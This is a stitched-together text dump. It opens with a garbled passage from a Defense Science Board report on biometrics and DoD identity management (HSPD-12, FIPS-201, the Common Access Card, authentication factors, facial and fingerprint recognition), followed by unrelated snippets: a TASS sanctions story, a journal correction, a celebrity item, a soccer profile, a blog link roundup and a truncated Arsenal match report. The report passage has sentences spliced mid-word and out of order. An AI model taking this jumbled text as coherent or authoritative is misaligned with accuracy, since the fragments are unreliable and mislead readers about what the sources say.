standards are common between themand therefore might not meet their standards. ", "The effort to achieve cross-organizationalmanagement confidence, in root identity and authorities, is the stuff of Privilege Management,which we will discuss later.", "HSPD-125and its related technical standard, FIPS 2016is one example of many sets ofinitiatives to improve Identity Assurance. ", "From our point of view, it is by far the mostimportant, as it is mandatory across the entire federal executive enterprise. ", "HSPD-12specifically addresses the federal government and extends explicitly to certain commercialentities (federal contractors). ", "It has been extended implicitly to state, local and tribalgovernments within the United States, in the form of assuring access to, and interoperabilitywithin, certain federal programs. ", "The FIPS-201 technical standard developed under authority ofHSPD-12 has been adapted in other current programs with even broader scope, such as theTransportation Worker Identification Credential (TWIC), and the First Responder Access Card(FRAC). ", "We expect this trend to continue.ted prior to issuance to ensure theapplicant’s eligibility and uniqueness within the database.", "An Identity Management “System”\n\nThe FIPS-201 standard is a smart card based on common criteria to verify an individual’sidentity; is strongly resistant to fraud, tampering, counterfeiting, and terrorist exploitations;allows for personal identity to be rapidly verified electronically if visiting other facilities; andcomes from a controlled set of issuers to assure quality and standards. ", "The whole process ismade more rigorous by the background checks conducThe real meat of a modern Identity Management system is not the front end, badges, tokens,and/or biometrics, but the information system in which they operate, the “IT backplane”. ", "Thisrecognition represents a change in the attitude of program sponsors and the user population.", "Complex/expensive tokens (e.g. Smart Card) are useful and prescribed in many applications but,\n\n5Homeland Security Presidential Directive (HSPD) 12 – Policy for a Common Identification Standard for FederalEmployees and Contractors requires government-wide uniformity and interoperability to support technicalinteroperability among departments and agencies, including card elements, system interfaces, and security controlsrequired to securely store and retrieve data from the card.6\n\nFederal Information Processing Standard (FIPS 201) for Personal Identity Verification (PIV) of FederalEmployees and Contractors: This standard specifies the architecture and technical requirements for a commonidentification standard for Federal employees and\n\ncontractors. ", "The overall goal is to achieve appropriate securityassurance for multiple applications by efficiently verifying the claimed identity of individuals seeking physicalaccess to Federally controlled government facilities and electronic access to government information systems.10____________________________________________\n\nDEFENSESCIENCEBOARDTASKFORCE ON\n\n________________________________________________________CHAPTER\n\n2:\n\nINTRODUCTION\n\nif limited to local operation, are often impractical in situations where DoD seeks an ID solution.", "The geographic and organizational scope, plus the growth in size of enrollee populations, hasmade it clear that modern networked IT solutions offer the best hope of achieving missionsuccess. ", "The centralization in design, development, management and operation that usuallyaccompanies networked systems provides economies of scale and allows us to amortize costsover a larger set of uses. ", "It also is associated with improvements in interoperability.eyond thescope of this report, but it remains an important issue within that larger field of study.h, and delete digitalidentities based on policy and accepted practice.", "\n\nFocusing for a moment on tokens and credentials, it is clear that there are currently many ofthese in important roles. ", "Some of them, hopefully the best, almost certainly the most expensive,use biometrics either “on-card” or in conjunction with stored indices. ", "A complete review oftokens and credentials, and their role within a total Identity Management system, is bIdentity Management is a set of processes, policies, tools, connectivities, and social contractsprotecting the creation, maintenance, use and termination of an identity. ", "Figure 1 shows asimplified data flow diagram depicting the creation of a Digital Identity Record in a traditionalenterprise environment. ", "Not all processes are the same and all will vary. ", "It is here that decisionmakers and stakeholders, with the proper authority, can modify, searc\n\nFigure 1: The Creation of a Digital IdentityDEFENSEBIOMETRICS____________________________________________________________________11\n\nCHAPTER2:\n\nINTRODUCTION__________________________________________________________Historically, the Department of Defense has had a number of different Identity Management“systems” of both large and small scale. ", "Only very recently, with the advent of Presidentialpolicy in the form of HSPD-12, has the federal government, and as such the DefenseDepartment, moved toward a single, common and interoperable technology and policy approachto “Identity.” ", "The technological particulars of the design, implementation and operation of anysuch system, of course, depend on: The purpose of the system: What problem or problems is it attempting to address?What DoD/USG missions does it seek to enable? The population subtended by the system, and the way the identities of these individualswould be authenticated. The scope of the data, both “identifiers” and “collateral” data that would be gatheredabout individuals in support of “issuing an ID” - figuratively, i.e., enrolling them inthe system; and, literally, i.e., issuing a token - and the way that identity would becorrelated with (mapped to) data about the individual in any databases associated withthe system. The users of the system, those who would be issued an ID, Department and OGA officersand, perhaps, non-federal authorities including the private sector. The types of use allowed, and under what circumstances: What types of databasequeries about individuals would be permitted? Required “interoperability” with other databases. ", "The ability to retrieve informationand make inferences across multiple datasets.− The Task Force notes this important question appears to have beenhonored more in the breach than the observance as systems were fieldedexpediently in support of the warfighter. Degree to which data mining or analysis of the information collected would bepermitted. ", "Who would be allowed to do such analysis? ", "For what purposes? Degree to which enrollment in and/or identification by the system (even if theindividual had not formally been enrolled) would be mandatory or voluntary. Legal structures that protect the system’s integrity as well as the ID holder’s privacyand due process rights: What structures determine the government and relying parties’liability for system misuse or failure?Of all these features and considerations, HSPD-12 provides only the most basic, but this is thefoundation upon which all else can be built. ", "Put another way, absent the HSPD-12 foundation,all such effort would represent a house built on sand. ", "As such, it defines the space within whichremaining policy, technical, and organizational efforts are still required.12____________________________________________\n\nDEFENSESCIENCEBOARDTASKFORCE ON\n\n________________________________________________________CHAPTER\n\n2:\n\nINTRODUCTION\n\nAs has been pointed out,7implicit in the totality of these considerations is the notion of a“system” and not merely an ID card or biometric. ", "The importance of the fact that identitymanagement necessarily implies a “system” cannot be overstated. ", "Such systems, at the scalethat they would operate in the Department, necessarily imply the linking together of manysocial, legal, and technological components in complex and interdependent ways. ", "The successor failure of such a system is dependent not just on the individual components (for example, theID cards that are used or the biometric readers put in place) but on the ways they work, or do notwork, together. ", "For example: Are card enrollment/authentication devices located where they need to be? ", "How well dothe devices operate under various environmental and load scenarios? Who will operate the systems and how will they be trained and vetted? Do enrollment policies align with the security needs envisioned for the system? ", "And soon.", "How well these interdependencies are controlled along with the mitigation of securityvulnerabilities and the unintended consequences of the deployment of a system, will be criticalfactors in its overall effectiveness.", "In addition to the questions above, the reference outlines several cautions to bear in mind whenconsidering the deployment of a large-scale identity system: Given the costs, design challenges, and risks to security and privacy, there should bebroad agreement in advance on what problem or problems the system would address. The goals of the system should be clearly and publicly identified and agreed upon,with input sought from all stakeholders. Care must be taken to explore completely the potential ramifications of deploying a large-scale identity system, because the costs of fixing, redesigning, or even abandoning asystem after broad deployment would likely be extremely high.", "\n\n7IDs—Not That Easy: Questions About Nationwide Identity Systems, Statement of Stephen T. Kent Vice Presidentand Chief Scientist, Information Security BBN Technologies and Chairman Committee on AuthenticationTechnologies and Their Privacy Implications National Research Council The National Academies before theSubcommittee on Social Security Committee on Ways and Means U.S. House of Representatives March 16, 2006DEFENSEBIOMETRICS____________________________________________________________________13\n\nCHAPTER2:\n\nINTRODUCTION__________________________________________________________Identity ProcessesThe Identity Process is one of the most interesting and technologically challenging parts of theIdentity Protection environment because of the complexities of how we do business. ", "There areseveral separate and discreet parts to this process. ", "They include:Identity– Who you are8\n\nAuthentication– The process which states that your identity and the activities that havebeen evaluated in your past meet the policy and integrity standards to be certified as amember of that organization or agency.", "Assertion— The process of claiming an identity in order to obtain a privilege, or set ofprivileges, previously established for that identity.", "Authorization– The act of granting a person permission to use, or have access to, specificphysical or logical resources within that organization or agency.", "In the world of Identity Protection there is a statement that rings true, and is an important point toremember when describing the Identity Process:Identity / Authentication is a Universal Event, Authorization is a Local Event.", "Translated, that means that you are, or should, always be the same person9. ", "That is universal.", "However, you often have many different tasks and responsibilities that are unique to you, andwhich may be confined to specific situations or differing organizations/agencies. ", "It is quitepossible, or even probable that you might have differing permission sets assigned to youdepending on where you are accessing either physical or logical assets. ", "There is technology forthe Identity Process to directly address that in a very granular and secure fashion. ", "It allowspermission sets to be created, modified, and deleted quickly and efficiently based on policy, law,social convention, and security requirements.", "The “Root” IdentityAuthenticated root Identities are needed to make ID-enabled applications work. ", "One can onlyget to the payback at the application layer of an Identity Management system after havingundertaken the cost and effort of establishing verifiably-unique root identity enrollment. ", "Thisidentity must be “transportable” over time and distance, in terms that benefit both the enrolleeand sponsor. ", "The enrollee must be able to convincingly assert his true ID to access resources oravoid sanctions. ", "This aspect of the total IM strategy, the creation of root Identity to a strong andcommon standard, is the focal point of the prescriptive provisions of HSPD-12.", "\n\n8An important distinction here is the difference between “true identity,” a unique, provable, fact, for which the onlyreal proofs are biometric in nature; and a “persona” that one may adopt as being appropriate to some kind ofidentity-sensitive activity, such as sending e-mail or conducting an online auction. ", "The easy distinction is that anIdentity is an irreducible core fact, while a Persona, if it to be trusted, should have recourse to a true or “root ID,”whether or not that is visible to all parties, all the time.9The converse, of course, is that nobody else can be “you”.14____________________________________________\n\nDEFENSESCIENCEBOARDTASKFORCE ON\n\n________________________________________________________CHAPTER\n\n2:\n\nINTRODUCTION\n\nThe Role of BiometricsThere are numerous ID-sensitive applications extant today, especially in commercial practice,very many of which do not have an architectural/policy relationship to a true root identity. ", "Thecontribution of biometric processes to the total ID enterprise is the offer of high assurance ofuniqueness in initial registration, and added confidence to ID assertion in application. ", "As such,while it is certainly possible to engage in ID-sensitive activities without biometrics, there can beno truly accurate Identity Management system without biometrics. ", "In order to achieve, verify,and sustain that root identity, it is absolutely necessary to link the “legend,” biographicinformation claimed by an enrollee (name, date/place of birth, address, etc), to the person makingthe claims at the bodily level. ", "The emergence of this understanding has paced the growing roleof IT networks in IM, as discussed above. ", "Biometrics are difficult to verify in their originalform, but they all lend themselves to codification, analysis and expression as IT files. ", "Here theearlier point about social acceptance returns to the discussion. ", "Public acceptance of biometricshas grown cautiously over time. ", "Leading thinkers in the IM community have now been fieldingapplications that demonstrate and deliver real and practical benefits to consumers and managers,based on biometrics. ", "At the same time, the subject of biometrics is being gradually demystified,even as the underlying science is more richly and broadly understood. ", "Consequently, biometricsperformance issues are being approached and examined more pragmatically, with fewer inflatedexpectations, and less unreasoning skepticism.", "The maturation and availability of biometric capabilities within the Identity Managementprocesses has added significantly to the power and reliability of Identity. ", "Biometric technologyinvolves the capture and storage of a distinctive, measurable characteristic, feature, or trait of anindividual for subsequently recognizing that individual by automated means. ", "The biological traitis unique to a specific person that, when intrinsically linked to the Identity Management process,creates an extraordinarily strong link between the identity credential, or token that is presented,and the person who has it in their possession.", "The Identification TrinityIn the strongest identity formulation, we refer to “three factor authentication”: something youknow, something you have, and something you “are.", "”Something You KnowThis includes passwords, PINs, pass-phrases, and answers to authentication questions such as thename of your first pet or car, your mother’s maiden name, or other personally meaningfulassociation. ", "In the best case, such information is known only to you and “the system.", "”A selling point for such secrets as authenticators is that they are easily issued, invalidated in theevent of compromise, and reissued upon authorized request. ", "The down side is that, historically,they are readily compromised. ", "Insofar as they tend to be meaningful to you, someone whoknows you may know the secret or be able to guess the password or phrase. ", "The more generallymeaningful they are, the more susceptible to brute force “dictionary” attacks.", "DEFENSEBIOMETRICS____________________________________________________________________15\n\nCHAPTER2:\n\nINTRODUCTION__________________________________________________________Attempts to strengthen the secret “key” generally make them less individually meaningful,harder to remember, easier to forget. ", "The general response is to write them down somewhere,another avenue to compromise.", "Because different systems issue/register their own secret identifiers, coupled with the drive tomake them less easily compromised i.e., less meaningful, the response for those who must accessmultiple facilities/systems is to use the same secret on more than one system. ", "This means thatany compromise propagates across those systems. ", "It also opens the door to an “attractant”system obtaining your secret as you register in that system unaware of its nefarious purpose.", "For these and other reasons, multi-factor identification is preferred for serious security.", "Something You HaveNo matter how pervasive today’s digital technology, everyone has considerable experience withphysical identity tokens, mainly social security cards10, driver’s license, passport, birth and/orbaptismal certificate, employment-related badges, etc. ", "Some of these tokens are oftenmistakenly referred to as “ID cards” but are, to a certain extent, vehicles for conveying“privilege.” ", "They are generally the property of, and/or controlled by the privilege grantor.", "We have discussed HSPD-12, and its role in establishing strong root identity, its other majorprovision is the establishment of a common-format ID credential, which has become a technicalstandard known as FIPS-201. ", "The DoD Common Access Card (CAC), which predates FIPS-201, has since migrated to a compliant standard. ", "Some physical tokens may also contain digitalcertificates, crypto variables, and encoded biometric indices.", "The Department of Defense has invested prestige and resources in its Common Access Card(CAC), sometimes referred to as CAC-card (sic) The fundamental goal of using the CommonAccess Card is to authenticate the identity of the cardholder (uniformed military, civilian DoDpersonnel and contractors) to a system or person that is controlling access to a protected resourceor facility. ", "This end goal may be reached by various combinations of one or more of thefollowing validation steps.", "Card Validation- The process of verifying that a CAC is authentic and has not been subjectedto tampering or alteration. ", "Card validation mechanisms include: Visual inspection of the tamper-proofing and tamper-resistant features of the CAC; Use of cryptographic challenge-response schemes with symmetric keys; Use of asymmetric authentication schemes to validate private keys embedded within theCAC.", "\n\n10Never really intended to be an identity token or credential in the modern sense, it has no anti-tamper or IDauthentication, as expressly stated on the card: “not to be used for identification purposes.", "”16____________________________________________\n\nDEFENSESCIENCEBOARDTASKFORCE ON\n\n________________________________________________________CHAPTER\n\n2:\n\nINTRODUCTION\n\nCredential Validation- The process of verifying the various types of credentials (such asvisual credentials, CHUID11, biometrics, CAC keys and certificates) held by the CAC.Credential validation mechanisms include: Visual inspection of CAC visual elements (such as the photo, the printed name, and rank,if present); Verification of certificates on the CAC; Verification of signatures on the CAC biometrics and the CHUID; Checking the expiration date; Checking the revocation status of the credentials on the CAC.Cardholder Validation- The process of establishing that the CAC is in the possession of theindividual who is the legitimate holder of the card. ", "Classically, identity authentication isachieved using one or more of these factors: a) something you have, b) something you know, andc) something you are. ", "The assurance of the authentication process increases with the number offactors used. ", "In the case of the CAC, these three factors translate as follows: a) something youhave - possession of a CAC, b) something you know - knowledge of the PIN, and c) somethingyou are - the visual characteristics of the cardholder, and the live fingerprint samples provided bythe cardholder. ", "Thus, mechanisms for CAC cardholder validation include: Presentation of a CAC by the cardholder; Matching the visual characteristics of the cardholder with the photo on the CAC; Matching the PIN provided with the PIN on the CAC; Matching the live fingerprint samples provided by the cardholder with the biometricinformation on file at the Defense Manpower Data Center (DMDC).Something You “Are”—Biometric IndicesBiometrics are physiological features, fingerprint or iris pattern, that can be sensed easily by thesystem and are sufficiently unique to distinguish you from others in the population. ", "Yourbiometrics are not something you have to remember and might forget, so you don’t need to writethem down. ", "Biometrics indices are generally harder to compromise than other authenticationfactors, so biometric-based identification is harder to repudiate.", "In the previous discussion of the Common Access Card, biometrics are part of the multi-factorprocess in validating both the credential and the credential holder.", "\n\nINTRODUCTION__________________________________________________________Biometric Authentication ModelThe workflow for biometric authentication involves a two-stage process, as depicted in Figure 2below: Initial registration of the individual, preferably “face-to-face,” which, in turn, involves:o User identificationo Feature captureo Template constructiono Inserting a record in the database which, logically, contains at least an accessionnumber, and the user identification User authentication, which may be local or remote, and involves:o Identity assertiono Feature captureo Retrieval of the registration template from the asserted-identity recordo Scoring against the registration template\n\nData Management IssuesIt’s not really who you are, it’s what you are. ", "Identity management systems inherently contain,store and manage, sometimes very dynamically, masses of data. ", "These range from rawbiometrics, to templated versions of the same, to associated biographic information. ", "Associatedprivilege information may be involved, and also perhaps digital signatures, certificates and otherarchitectural and security features. ", "Establishing a good data architecture is essential to effectiveidentity management. ", "Being able to retrieve related data and cross reference across relevant datasets is really the point of it all.", "Observation: The Department of Defense does not appear to have a comprehensive dataarchitecture for identity management in its various aspects, nor does it appear to have anyoneresponsible for creating and maintaining such an architecture. ", "This is especially importantbecause the various relevant data sets across which one might wish to operate (i.e., crossreference) are scattered and under “local” control. ", "Indeed, many of the relevant datasets areoutside the Department itself. ", "It is very difficult at present, and institutionally resisted to at leastsome extent, to recognize and accept credentials issued by other federal agencies. ", "The “fix” forthis suboptimal situation is broadly embraced within “Privilege Management” concepts,discussed in detail later in this report.", "Recommendation1: The PSA for Biometrics, in the absence of a PSA for identitymanagement, should identify the responsible actor in the Department and ensure that a datamodel/architecture is developed and maintained. ", "The PSA should become the “functionaladvocate” for biometrics and identity management, in terms of their use in the GlobalInformation Grid (GIG).DEFENSEBIOMETRICS____________________________________________________________________19\n\nCHAPTER3:\n\nDATAMANAGEMENTISSUES_________________________________________________\n\n20____________________________________________\n\nDEFENSESCIENCEBOARDTASKFORCE ON\n\n_____________________________________CHAPTER4:\n\nTHEPOWER OFID\n\nSENSITIVEAPPLICATIONS\n\nThe Power of ID-Sensitive ApplicationsThe value of any Identity Management system exists in the Applications. ", "Simple ID enrollment,in and of itself, never pays off in terms of a demonstrated, measurable and attractive “return oninvestment”. ", "The processes of establishing programs, gathering and maintaining data,conducting investigations to verify enrollee claims, and issuing badges, all represent costs, andall are fronted-loaded within an Identity Management implementation. ", "No matter how youmeasure it, the value is found in the practical use of the Identity Management system. ", "Theseapplications include a broad and ever-expanding range of enhancements to personnel andinformation security, force protection, intelligence and other important missions. ", "The good newsfor the DoD is that given all historic effort in developing and fielding the CAC, not to mentionHSPD-12, there is already a sunk-cost investment in the necessary foundation upon which anapplications architecture can be built.", "It is possible to envision an expanding set of ID-sensitive applications in work andsociety, collectively comprising what one author has termed an “Identiverse,” withinwhich security and functionality are enhanced, privacy as well, if designed and managedproperly. ", "Benefits may take the form of increased efficiency in workflow, access toresources, convenience, etc.", "\n\nThe “Back Office” ProcessMuch of the focus in the application of biometrics in support of identity management is vested inthe “front end” or “point of sale.", "” The lance corporal who fingerprints, and thereby identifies a “high value target,” or hiscounterpart police officer on the beat who nabs and identifies one of the “ten mostwanted” or; The guard at the turnstile of a sensitive facility who prevents the would-be terrorist fromentering the facility under false pretenses or the immigration control officer ortransportation safety worker who identifies a known terrorist.", "However, the real work is being done by the servers in the back office that maintain, compareand retrieve the relevant data on which action can be taken. ", "In Figure 3, the work flow is shownfor the Integrated Automated Fingerprint Identification System (IAFIS) run by the FBI’sCriminal Justice Information Services Division (CJIS)12.", "\n\nFigure 3: IAFIS Workflow\n\n12See Glossary for long titles and definitions used in this model.", "DEFENSEBIOMETRICS____________________________________________________________________23\n\nCHAPTER5:\n\nTHE“BACKOFFICE”\n\nPROCESS_______________________________________________In the DoD cases, the work flow is more complicated still because there is a diaspora of datasetsthat could inform the actions, some of which are under disparate management within theDepartment, and some outside the Department, as well. ", "As we observe elsewhere the datamodels/architectures for the identity management system are critical, as are the hardware andsoftware systems architectures in which the data are embedded. ", "Moreover, for most criticalbiometric-enabled processes today, there are humans in the loop responsible for qualityassurance.", "Observation: Enterprise-wide systems analysis has not yet been brought to bear on the identity-management processes that support DoD missions. ", "The business and work-flow processes areneither documented nor fully understood, it seems, and it is not clear where the accountability forthese lies.", "Recommendation2: The PSA for biometrics, in lieu of a PSA for identity management, shouldassign the accountability for analyzing, documenting, and refining the business and work-flowprocesses and systems architecture(s).24____________________________________________\n\nDEFENSESCIENCEBOARDTASKFORCE ON\n\n______________________________________________________CHAPTER6:\n\nBIOMETRICINDICES\n\nBiometric IndicesBiometric indices have unique characteristics. ", "Different applications of biometrics, different“use cases” or scenarios, place different demands on the biometric indices. ", "Some biometrics arebetter suited than others to a specific use case. ", "Figure 4 suggests a relevant set of attributes bywhich the suitability of the array of biometric indices might be judged.", "\n\nFigure 4: Biometric CharacteristicsIn the table at Appendix O, Biometric Modalities Matrix, we evaluate a relevant subset ofpossible biometric indices against a set of appropriate attributes according to our understandingof their state of maturity as of this writing13. ", "Some of these modalities that are of most relevanceto DoD activities are discussed in further detail in the following sections.", "Facial Recognition14\n\nFacial recognition is clearly something that humans rely on daily, yet experience tells us thateither we are not perfect at it, or faces/facial features are not all that unique. ", "Both are likely true,and until recently, humans were about as good at facial recognition as computers,\n\n13. ", "It is important to note that there are a number of such short-form analyses extant, and all of these are somewhatdifferent in format and/or content. ", "The Task Force drew from existing work, personal knowledge and experience toderive the issues deemed to be of greatest relevance to the DoD, as reflected in the format here. ", "See, inter alia,www.biometrics.gov/referenceroom/introduction.aspx; also www.biometrics.gov/docs/biooverview.pdf\n\n14Additional information about face recognition technology can be found at www.biometrics.gov//docs/facerec.pdfDEFENSEBIOMETRICS____________________________________________________________________25\n\nCHAPTER6:\n\nBIOMETRICINDICES________________________________________________________Facial recognition is vulnerable to disguise. ", "Everyday experience suggests that if we are tryingto avoid recognition, disguise can be moderately effective, but if we are trying to impersonatesomeone else, disguise is likely to be somewhat less effective. ", "Notwithstanding, it is aconvenient biometric because it is one of the few that is both “machine-readable” and “human-readable” so it is generally used for identification cards and badges, although it should generallybe used in combination with other biometrics, i.e., multi-modal. ", "The ubiquity of surveillancecameras means that, in a sense, a face can leave a trace and therefore be useful forensically, asare DNA and fingerprints. ", "As the resolution and other performance characteristics of theseimprove, Facial Recognition (FR) will become increasingly viable as a reliable identificationtool.", "Obviously, FR is also attractive from the standpoint of the opportunity it represents to detect,verify and track at some distance. ", "It is not alone in this attribute, and performance is not yetoptimal, but we may highlight this aspect of FR as an important avenue of future research effort.(See chapter 12).Man Against MachineHumans are not used to matching fingerprints, or DNA, but we do have a lot of practicalexperience at recognizing and recalling human faces15. ", "How good are we compared to thecurrent state of computer facial recognition?Recent research, sponsored by several interested federal organizations16, suggests that we are notall that bad at it. ", "Or, said differently, computers aren’t all that much better. ", "Figure 5 maps theprobability of a correct recognition against the probability of a false acceptance in identitymatching of “difficult face pairs.", "”17While there were two or three machine algorithms thatsurpassed the performance of the humans, we humans did quite well, and managed to beat outthe majority of the machine algorithms. ", "In this same paper, most face systems easily beat humanperformance on “easy face pairs.”", "\n\n15Studies have shown that individuals are good at recognizing faces they are familiar with (family, friends,celebrities, etc.), ", "but not so good with unfamiliar faces. ", "Individuals also tend to be better at distinguishing faceswithin ethnic groups that they have the most contact with (someone that doesn’t personally know someone from aparticular ethnic group will have difficulty distinguishing faces from that ethnic group).16Federal Bureau of Investigation, National Institutes of Justice, Department of Homeland Security and theTechnical Support Working Group.17Alice J. O’Toole, The University of Texas at Dallas, Human vs. Machine Performance, research sponsored by theTSWG, USG.26____________________________________________\n\nDEFENSESCIENCEBOARDTASKFORCE ON\n\n______________________________________________________CHAPTER6:\n\nBIOMETRICINDICES\n\nFigure 5: Facial Matching Performance CurvesOf course, the computer is significantly faster, but the same research did show that humansaren’t all that slow; our performance did not improve if we took longer than two seconds tocontemplate the faces. ", "Human performance did decline noticeably if the faces were only shownfor a half second or less. ", "Ultimately, though, computers will be increasingly fast and powerful,increasingly small and inexpensive, and have access to ever-improving matching algorithms. ", "Inthe Task Force’s view, this is the key insight: At the same time, collection devices (cameras)will also increase in ubiquity and performance. ", "Taken together, these conditions are expected tolead to strong advances in the prevalence and performance of automated FR applications. ", "Theemergence and refinement of “3D imaging,” as discussed later, will only serve to accelerate thistrend. ", "The “Rubicon” will be the acceptance of FR, given these enhancements, as anoperationally-practical modality for accurate, high-volume and high-speed search, which it is nottoday.", "DEFENSEBIOMETRICS____________________________________________________________________27\n\nFingerprint Identification is the method of identification using the impressions made by theminute ridge formations or patterns found on the fingertips. ", "One can hardly be unaware of thefact that criminal Identification by means of fingerprints is one of the most potent factors inapprehending fugitives.", "According to the FBI, no two persons have exactly the same arrangement of ridge patterns, andthe patterns of any one individual remain unchanged throughout life, in which case, fingerprintsoffer an infallible means of personal identification.", "Fingerprints can be recorded on a standard fingerprint card or can be recorded digitally19andtransmitted electronically to an authoritative service provider such as the Biometrics Fusion" ]
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[ "The sanctions cause damage to their initiators, Russia's president believes\n\nYAKUTSK, September 01. ", "/ITAR-TASS/. The initiators of sanction wars are sustaining damage themselves from such policies but common sense will take the upper hand sooner or later, Russian President Vladimir Putin said on Monday.", "\n\n“As for trade and economic restrictions, damage from this will eventually be borne primarily by those who are conducting such policies,” Putin said at a meeting with Chinese Vice-Premier Zhang Gaoli.", "\n\nThe meeting was held after Putin launched the construction of the Power of Siberia gas pipeline intended to pump natural gas to China under a $400 billion contract signed between Gazprom and China’s CNPC for a period of 30 years.", "\n\n“I hope that common sense will take the upper hand and all of us will enter a normal regime of cooperation,” Putin said.", "\n\nThe Chinese vice-premier said he supported this position. “", "I want to stress that the Chinese side is categorically against US and western sanctions on Russia, against ‘color revolutions’ and against the attempts to restrain Russia’s development,” he said.", "\n\n“We’ll do everything we can to provide all you need and our cooperation is expanding considerably, including trade in agricultural products,” the Chinese vice-premier said.", "\n\nThe USA, EU, Canada and Australia have introduced sanctions against Russia over its involvement in the Ukrainian crisis. ", "Infographics by ITAR-TASS\n\nFollowing Crimea’s accession to Russia and subsequent deterioration of the situation in Ukraine, Western countries imposed sanctions on Russia. ", "A series of targeted sanctions against a number of Russian officials and businessmen were followed by a package of sectoral sanctions that included a ban on exports of arms and dual use technologies, and restrictions in the financial sphere. ", "These sanctions forced Moscow to take countermeasures and ban exports of a wide range of foods from countries that had imposed sanctions against it.", "\n\nA recent summit of the European Union gave the European Commission a week to elaborate extra sanctions against Russia. ", "On Monday, Australian Prime Minister Tony Abbott announced his country’s plans to impose additional sanctions on Russia. ", "He said these extra sanctions would include restrictions on exports of armaments, on access of Russian state-owned banks to Australia’s markets of capital, measures to prevent exports of goods and services used in intelligence activities and in oil production in Russia, and restrictions in trade and investments in Crimea." ]
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[ "**Correction to: CVIR Endovasc (2018) 1:19**\n\n**https://doi.org/10.1186/s42155-018-0027-z**\n\nIn the published article (Duvnjak et al. [", "@CR1]) the statement under the subheading 'Consent for publication' is incorrect.", "\n\n\"Not applicable\"\n\nshould read:\n\n\"Informed consent for publication of this case report and its accompanying images has been obtained from the patient\"\n\nThe original article can be found online at 10.1186/s42155-018-0027-z\n" ]
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[ "Selena Gomez says the death of her longtime friend Christina Grimmie has left her heartbroken.", "\n\n“My heart is absolutely broken,” the singer wrote alongside a photo of the pair on Twitter. “", "I miss you Christina.”", "\n\nGrimmie, who developed a following on YouTube, was discovered by Gomez’s stepfather Brian Teefey in 2010. ", "After the singer released her first EP a year later, she became a supporting act for Gomez during the U.S. leg of her We Own the Night tour. ", "Following her presence on The Voice season 6, Grimmie reunited with the “Hands to Myself” singer for her Stars Dance tour in 2013.", "\n\nThe two also featured in a promo for the Xbox 360 Kinect console in 2011. ", "Watch it below.", "\n\nGrimmie praised Gomez and her family during a 2011 interview with Seventeen magazine. “", "I’m so blessed that they’re in my life,” she said. “", "They’re literally like a family — Selena has been so encouraging ever since we got hooked up. ", "It’s crazy! ", "It’s very much a fairy tale.”", "\n\nGrimmie was shot after a show in Orlando, Florida, and later died due to her injuries. ", "She was 22 years old.", "\n\nFollowing her murder, Teefey created a GoFundMe page in support of the singer’s family." ]
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[ "Few athletes get the opportunity to be play in the pros, let alone play for their hometown team.", "\n\nKeegan Rosenberry has taken that opportunity and took off in a full sprint with it, making his impact with the Union fairly quickly.", "\n\nHowever, that might not have happened had Rosenberry not played soccer as a youth. ", "He credits his development, success and technical abilities to the skills he learned when he was younger.", "\n\n“I think for me, it had a lot to do with my development technically and as I matured as a player,” Rosenberry said. “", "I attribute a lot of my success to the skills I learned when I was young.”", "\n\nOne of the clubs that the Ronks, Penn., ", "native played for before being drafted by Philadelphia was Reading United AC of the Premier Development League. ", "He played for Reading in 2014 and 2015, helping them to the third and second round of the Open Cup, respectively.", "\n\nYouth Soccer Night tickets available for Union vs. Portland Buy Now!", "\n\nLast month, Rosenberry was one of the players chosen by fans for Reading United’s all-time Best XI.", "\n\nThat success with the club team has parlayed over into MLS.", "\n\nThe defender has played a full 90 minutes in every regular season game he’s been a part of with the Union and finished as the runner-up in the Rookie of the Year in 2016. ", "Rosenberry also made the 2016 MLS All-Star Game as a rookie." ]
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[ "Weekend Coffee Links – Labor Day Edition\n\nWelcome to your long weekend, my friends. ", "I hope you’re taking the time to treat yourself and spend a little extra time with your loved ones doing something fun. ", "Or at least not working. ", "Because working on 3-day weekends is actually illegal. ", "True fact. ", "As you’re reading this, I’m on a train down to Long Island to surprise my dad for his birthday. ", "But don’t ruin my cover, I’m hopin’ for tears! ;)", "\n\nBut you know the drill. ", "Below you’ll find some of my top link picks for the week. ", "Have something that caught your eye? ", "Feel free to share it with the group.", "\n\nA year of biblical study: An evangelist blogger is spending the next 12 months living out the Bible’s instructions for women. ", "What makes this story particular interesting is that Rachel Held Evans isn’t someone looking to make a joke (like AJ Jacobs did in his awesome book), she really believes it, which I think is pretty cool.", "\n\nHow to fix our math education: Why most people would be better served learning how mortgages are priced and how computers are programmed rather than the “pure math” educators keep trying to shove down our throats.", "\n\nA Timetable for Disarmament: Another piece from Slate. ", "This one tells you how long you should wait until cutting off a trapped limb. ", "What? ", "You never know when this kind of information could come in handy! ", "Er, no pun intended.", "\n\nAddiction, Sobriety and a Scandal: Melissa Petro shares what happened after she triggered a firestorm revealing her past as a sex worker and how it cost her a career as an educator. ", "Controversial, sure, but she definitely has an interesting look on things.", "\n\nThe Science of Gawker’s Nerd Baiting: For those of us in the publishing business, this is a really interesting read about how sometimes those little games we play for pageviews and comments just come back to bite us.", "\n\nThe open road: Why “the open road” really isn’t the epitome of freedom that many people think it is and what freedom really means.", "\n\nContact\n\nOutspoken Media, Inc.\n\n415 River Street, Suite 201Troy, NY12180United States\n\nPhone: (518) 326-5500\nFax: (518) 874-5130\n\nWe're Always Hiring\n\nWant to be part of an amazing team? ", "Learn more about careers with Outspoken Media. ", "We're always looking for great writers, marketers, and SEOs in the Capital District and SEO consultants willing to relocate." ]
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[ "Arsenal's Europe League match with Vorskla Poltava in doubt after match was moved to Kiev\n\nArsenal's Europa League match against Vorskla Poltava on Thursday is in doubt after the Ukrainian side said they could not guarantee they would be able to fulfil the fixture.", "\n\nUEFA took the decision to move the game to the Olympic Stadium in Kiev, following the introduction of martial law in some parts of Ukraine due to escalating tensions with Russia amid a row over Ukrainian ships in Crimea.", "\n\nUkraine parliament voted to introduce 30 days of martial law across 10 of its regions, in effect from Wednesday, but Poltava was not one of them with the fixture now set to be held about 200 miles away from its originally scheduled venue.", "\n\nPoltava - in north-eastern Ukraine - is around 400 miles from Crimea and just over 100 miles from the Russian border. ", "The state does not have a border with Russia.", "\n\nAround 500 Arsenal fans are expected to make the trip and some have already been affected by the late change of venue, with the club's supporters critical of UEFA's decision.", "\n\nUEFA say they are working closely with the Football Federation of Ukraine in order to ensure the game goes ahead in Kiev on Thursday.", "\n\nA statement released on Wednesday said: \"The urgent decision of UEFA to relocate the match to Kiev was based on the sudden introduction of Martial Law and the uncertainty of the security situation in some parts of Ukraine and particularly given the extremely short timescale available to evaluate all existing risks.", "\n\n\"UEFA is now working closely with the Football Federation of Ukraine to ensure that the match goes ahead in the Olympiskiy 